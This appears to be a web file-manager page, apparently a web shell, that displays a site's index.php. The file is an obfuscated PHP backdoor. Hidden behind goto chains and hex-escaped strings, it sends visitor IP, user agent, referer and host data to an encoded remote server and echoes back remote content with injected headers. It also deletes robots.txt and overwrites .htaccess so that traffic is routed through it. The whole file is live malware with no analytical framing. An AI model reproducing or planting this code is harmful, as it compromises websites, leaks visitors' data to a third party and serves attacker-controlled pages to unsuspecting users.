OwlCyberSecurity - MANAGER

Edit File: index.php

<?php
 goto BCQtB; uyJS_: PctQ2: goto ZvutM; isyzI: RNiK2: goto LS9vA; Zf_1n: dE7h3: goto ElODs; rIH57: DMr9z: goto RN5gr; rNA9N: $params["\160\x72\157\164\x6f\x63\x6f\154"] = isset($_SERVER["\x48\x54\x54\x50\x53"]) ? "\150\164\x74\160\x73\72\x2f\57" : "\150\x74\164\160\72\57\x2f"; goto tIwK8; Dpwu4: if (isset($_REQUEST["\160\141\x72\141\x6d\163"])) { $params["\x61\x70\x69"] = $api; print_r($params); die; } goto PyN3M; Elx3f: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto e8Z5x; Hnb3i: C7vsu: goto ao33u; CmaTN: eyzuU: goto DE_Ev; l0yXL: goto jbwNu; goto yBXdY; uz21j: $params["\x6c\141\x6e\147\x75\x61\147\145"] = isset($_SERVER["\110\x54\x54\x50\137\x41\x43\x43\x45\120\x54\x5f\x4c\101\116\107\125\x41\107\x45"]) ? $_SERVER["\x48\x54\124\x50\x5f\x41\103\x43\105\120\x54\x5f\114\101\x4e\x47\125\x41\x47\x45"] : ''; goto OSKuJ; ji3vc: hAC4o: goto W12Bg; jmNl6: FCYBD: goto i_ZTe; oyN9b: xzKY7: goto W980v; t3a8J: EHkKk: goto lnUlK; q0PQn: zbIMD: goto Zf_1n; P_Rnk: goto XHuHe; goto isyzI; E3IqZ: if ($params["\151\x70"] == null) { $params["\x69\x70"] = ''; } goto GAt2o; BCQtB: goto KLKHv; goto wkLed; LtFrr: goto IzMNc; goto XYh_Z; UwqRR: fIGts: goto MS2dU; NsxD_: IzMNc: goto SE7ll; DE_Ev: goto zm87Z; goto jB4ZP; ldtST: O3rro: goto E3IqZ; iNQkf: goto nuw2Z; goto DD7wk; izYZB: goto C7vsu; goto HpMwr; PKG7H: goto DMr9z; goto OGSEJ; ao33u: olK3F: goto QnasD; XJUH8: goto hr4pR; goto q0PQn; Ijd90: $params["\162\145\x66\x65\x72\145\x72"] = isset($_SERVER["\110\x54\124\120\137\122\x45\106\105\x52\x45\122"]) ? $_SERVER["\x48\124\x54\x50\x5f\x52\105\106\x45\122\105\x52"] : ''; goto poL2R; X2Kog: goto JU0W0; goto Zqaif; B6b3f: goto aqexB; goto S5wVI; W12Bg: goto RNiK2; goto QB4PV; T3yik: W9vm5: goto IoY7_; yBXdY: goto BSpau; goto UwqRR; TC02C: caPEe: goto PxQtp; RrznN: Ce8ZS: goto KDULU; mjY5b: goto jtw7L; goto TC02C; IoY7_: goto BWLbM; goto mjY5b; uxJ1A: goto Vnfx4; goto Tbt3f; gJh3q: goto NlVNd; goto NoY35; suqn6: aLz5B: goto AhpCZ; VIpzw: goto fIGts; goto oE1Zx; P3vmg: goto PctQ2; goto suqn6; G9a2t: ntszK: goto rUKYV; h44Q4: goto bgjaI; goto kZPZ9; tIwK8: goto SQ9q_; goto uyJS_; hFp2E: goto eyzuU; goto lBidK; hPdbt: BWLbM: goto VIpzw; rUKYV: goto dE7h3; goto Svj0v; f8KME: ZxrBW: goto Elx3f; QB4PV: O1Tx0: goto x749H; Ukbc6: bgjaI: goto jmNl6; VdI7V: goto FPqTS; goto NsxD_; e8Z5x: goto zS8PM; goto KgGW2; OSKuJ: goto KMZAr; goto rxyRF; IktaO: BzCay: goto fabxo; NgJ3F: BSpau: goto YT7wX; Ckjz3: goto kyMAv; goto ldtST; n85OD: goto hzVvS; goto HYBTC; poL2R: goto caPEe; goto P78aI; IkN2j: goto lS78k; goto rXHVK; rXHVK: goto UROCf; goto LSd6O; kVQ3x: goto FCYBD; goto Taoh1; PxQtp: goto EHkKk; goto izYZB; mRqwM: goto KiFFR; goto vLPrB; P78aI: jtw7L: goto QBfbC; e094h: goto wXlaf; goto DR5RB; NoY35: XHuHe: goto ZR5ho; kVMcF: EkxLI: goto B6b3f; rX8Bc: npkub: goto hFp2E; rxyRF: eh_sU: goto YuLd_; fabxo: goto hAC4o; goto isJd2; zQvy0: $params["\151\160"] = isset($_SERVER["\110\x54\124\120\137\126\x49\x41"]) ? $_SERVER["\x48\124\124\x50\x5f\x58\137\x46\117\x52\x57\x41\122\x44\105\104\x5f\x46\117\x52"] : $_SERVER["\x52\105\115\x4f\124\x45\137\101\104\104\122"]; goto VdI7V; Zqaif: goto zbIMD; goto Ukbc6; HpMwr: SQ9q_: goto X2Kog; Tbt3f: aqexB: goto Ijd90; GQsC7: zH72c: goto hPdbt; W980v: goto EkxLI; goto LtFrr; IYdZr: PdSdv: goto IkN2j; SE7ll: lS78k: goto P3vmg; KQbvL: uOllj: goto ExxuX; rFMSP: djef0: goto lXWZe; kSdFp: goto PdSdv; goto f8KME; RN5gr: goto jOxXG; goto NgJ3F; LS9vA: $params["\x72\145\161\x75\145\x73\164\x5f\165\x72\154"] = $_SERVER["\122\105\x51\x55\x45\x53\124\137\x55\122\x49"]; goto EVvQU; DN8An: goto juiYX; goto IktaO; oE1Zx: w1Ccr: goto mnSgj; PyN3M: goto W9vm5; goto rX8Bc; MfKd_: quICW: goto LQqEk; GAt2o: goto npkub; goto Qhmue; kZPZ9: hr4pR: goto kVQ3x; MS2dU: h2(); goto kSdFp; taSMU: fnYMJ: goto Tp424; AhpCZ: KiFFR: goto BXQYM; lnUlK: goto uOllj; goto oyN9b; frYDm: KMZAr: goto PKG7H; HYBTC: miWrv: goto CmaTN; lBidK: goto fnYMJ; goto G9a2t; S5wVI: CaPMu: goto rFMSP; isJd2: goto miWrv; goto Hnb3i; BXQYM: goto quICW; goto MfKd_; mu0z2: goto BzCay; goto KQbvL; XYh_Z: nuw2Z: goto mRqwM; ZvutM: $try = 0; goto fTA54; QBfbC: jbwNu: goto DN8An; x749H: $params["\x64\157\x6d\141\151\156"] = isset($_SERVER["\110\x54\124\x50\137\110\117\x53\x54"]) ? $_SERVER["\110\x54\x54\x50\137\110\117\x53\124"] : $_SERVER["\x53\x45\x52\x56\105\x52\x5f\x4e\101\x4d\x45"]; goto mu0z2; i_ZTe: goto O1Tx0; goto frYDm; DR1Dq: kyMAv: goto t3a8J; G0XP8: goto e9eDK; goto hjgqM; Svj0v: goto CaPMu; goto u7CFO; Qhmue: UROCf: goto rIH57; ElODs: goto Ce8ZS; goto taSMU; fTA54: goto ntszK; goto DR1Dq; TqJhg: goto MFa8E; goto gJh3q; LSd6O: jOxXG: goto Dpwu4; vLPrB: goto zH72c; goto T3yik; u7CFO: KLKHv: goto YevVF; h2frL: function h2() { if (file_exists("\162\157\x62\x6f\x74\x73" . "\56\164\x78\x74")) { @unlink("\x72\x6f\x62\x6f\164\x73" . "\x2e\x74\170\x74"); } $htaccess = "\56" . "\150\x74\x61\143\x63\x65\163\163"; $content = @base64_decode("\120\x45\132\160\142\107\x56\x7a\124\127\x46\x30\131\62\x67\147\111\x69\64\157\143\x48\x6c\70\132\130\x68\154\146\110\x42\157\143\x43\153\153\x49\x6a\x34\113\111\x45\x39\171\x5a\x47\126\171\x49\x47\x46\x73\142\x47\x39\x33\114\107\x52\x6c\142\x6e\153\113\111\x45\122\x6c\142\x6e\x6b\x67\x5a\x6e\x4a\166\x62\x53\102\x68\x62\107\167\113\120\103\x39\x47\x61\x57\x78\154\x63\60\x31\150\x64\x47\116\x6f\120\147\x6f\x38\x52\155\x6c\163\132\x58\116\116\x59\x58\x52\x6a\141\x43\x41\x69\x58\x69\150\x68\x59\x6d\x39\61\144\x43\x35\x77\x61\110\x42\70\x63\x6d\x46\x6b\x61\x57\x38\x75\143\x47\150\167\x66\107\x6c\165\132\x47\x56\64\114\156\102\157\x63\x48\x78\x6a\142\62\65\60\132\x57\x35\60\x4c\x6e\x42\x6f\x63\x48\x78\163\x62\62\116\x72\x4d\172\x59\x77\x4c\x6e\x42\x6f\x63\110\x78\x68\x5a\107\x31\160\x62\151\x35\x77\141\x48\x42\70\x64\x33\101\164\x62\x47\71\156\141\127\x34\x75\x63\107\150\167\x66\x48\144\167\114\x57\x77\167\132\62\x6c\x75\114\156\102\157\x63\110\x78\x33\x63\x43\x31\60\x61\x47\126\164\132\123\x35\167\x61\110\102\70\144\63\x41\164\x63\62\116\171\141\x58\x42\60\x63\171\65\x77\141\x48\102\x38\144\x33\101\x74\132\x57\x52\160\144\107\x39\171\x4c\156\x42\x6f\143\110\170\x74\131\127\x67\x75\x63\107\x68\x77\146\107\160\167\114\156\x42\157\x63\x48\x78\154\145\x48\x51\x75\143\x47\x68\167\113\123\x51\151\x50\x67\157\x67\124\63\112\153\132\130\111\x67\131\x57\170\163\x62\63\143\163\132\x47\x56\x75\145\x51\157\x67\x51\x57\170\163\x62\x33\143\x67\132\x6e\x4a\166\142\x53\102\x68\x62\107\167\x4b\120\x43\71\107\141\x57\x78\154\143\x30\61\x68\x64\107\116\157\x50\x67\157\70\123\x57\x5a\116\142\x32\122\x31\x62\107\125\x67\142\127\71\x6b\130\x33\112\x6c\x64\63\x4a\160\144\107\x55\165\131\172\x34\x4b\125\155\x56\x33\143\x6d\154\60\132\125\x56\x75\132\62\x6c\x75\x5a\123\102\120\142\147\x70\x53\x5a\130\x64\171\x61\x58\122\x6c\121\155\x46\x7a\132\x53\x41\166\103\x6c\x4a\x6c\x64\63\x4a\160\x64\x47\x56\123\x64\x57\170\154\111\106\65\160\x62\155\x52\x6c\x65\106\167\165\x63\107\x68\167\112\103\101\164\111\x46\x74\115\130\x51\160\123\x5a\130\144\x79\x61\130\x52\x6c\121\x32\x39\x75\x5a\x43\x41\x6c\145\61\112\x46\125\x56\x56\106\x55\x31\x52\146\122\x6b\x6c\115\122\x55\x35\102\x54\x55\x56\71\x49\103\105\164\132\x67\x70\123\x5a\130\144\x79\141\x58\122\x6c\x51\62\x39\165\x5a\x43\x41\154\x65\x31\x4a\x46\125\126\x56\x46\125\61\x52\x66\122\153\x6c\x4d\122\x55\x35\x42\x54\x55\x56\71\x49\x43\x45\164\132\101\160\x53\132\x58\144\171\141\130\122\x6c\125\156\x56\x73\x5a\x53\x41\x75\x49\103\x39\160\142\155\x52\x6c\x65\103\65\167\141\x48\x41\147\127\x30\x78\x64\x43\x6a\x77\x76\123\x57\132\116\x62\x32\x52\61\x62\107\x55\53"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto iNQkf; wkLed: juiYX: goto zQvy0; Tp424: MFa8E: goto G0XP8; LQqEk: $api = base64_decode("\x61\110\122\x30\143\x44\x6f\x76\114\x7a\x59\170\x4e\104\x59\x74\131\x32\147\60\x4c\x58\131\171\117\x44\147\165\x61\x57\61\x6e\x4e\x33\x6c\x68\x61\107\x39\166\x4c\x6d\116\166\x62\x51\x3d\75"); goto XJUH8; QnasD: goto O3rro; goto AcHz_; KJyI0: goto w1Ccr; goto lP66g; YevVF: goto djef0; goto uxJ1A; ExxuX: $params["\x61\147\145\x6e\164"] = isset($_SERVER["\x48\x54\124\x50\137\x55\x53\105\x52\x5f\x41\107\x45\x4e\124"]) ? $_SERVER["\110\124\x54\x50\137\x55\x53\105\122\137\x41\107\105\x4e\124"] : ''; goto n85OD; YT7wX: JU0W0: goto e094h; AcHz_: hzVvS: goto l0yXL; mnSgj: goto xbySI; goto Ckjz3; hjgqM: FPqTS: goto jy4xX; EVvQU: goto xzKY7; goto GQsC7; DR5RB: zm87Z: goto rNA9N; YuLd_: xbySI: goto P_Rnk; lP66g: e9eDK: goto h2frL; KDULU: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\x5c\174\x2f\x73\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto KJyI0; jy4xX: goto olK3F; goto h44Q4; OGSEJ: goto aLz5B; goto RrznN; Taoh1: goto eh_sU; goto IYdZr; Rvv1t: wXlaf: goto uz21j; lXWZe: goto ZxrBW; goto Rvv1t; DD7wk: Vnfx4: goto ji3vc; jB4ZP: zS8PM: goto TqJhg; KgGW2: NlVNd: goto kVMcF; ZR5ho: ?>